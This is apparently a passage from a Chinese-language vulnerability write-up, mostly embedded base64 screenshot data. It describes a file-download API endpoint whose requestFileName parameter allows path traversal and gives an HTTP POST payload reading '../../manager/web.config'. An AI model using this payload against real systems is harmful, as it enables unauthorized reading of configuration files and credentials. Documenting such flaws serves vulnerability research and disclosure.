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
<p blockindex=54>例如这个接口，获取两个参数requestFileName和pathType</p>
<p blockindex=55><img src="data:image/png;base64,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
<p blockindex=56>pathType同样是选择不同的路径，可以用requestFileName进行路径穿越读到我们想要的文件</p>
<p blockindex=57>payload:</p>
<pre blockindex=58><code class="hljs language-php">POST /api/files/DownloadFile HTTP/<span class=hljs-number>1.1</span>

token=zxh&amp;requestFileName=../../manager/web.config&amp;pathType=<span class=hljs-number>1</span>
</code></pre></div></div>
 </div>
 <div class="post-opt mt-30">
 <ul class="list-inline text-muted">
 <li>
 <i class="fa fa-clock-o"></i>
 发表于 2024-03-04 10:11:05
 </li>
 
 
 
 </ul>
 </div>
 </div>
 
 </div>
 
 
 </div>
 
 
 </div>
 </div>
</div>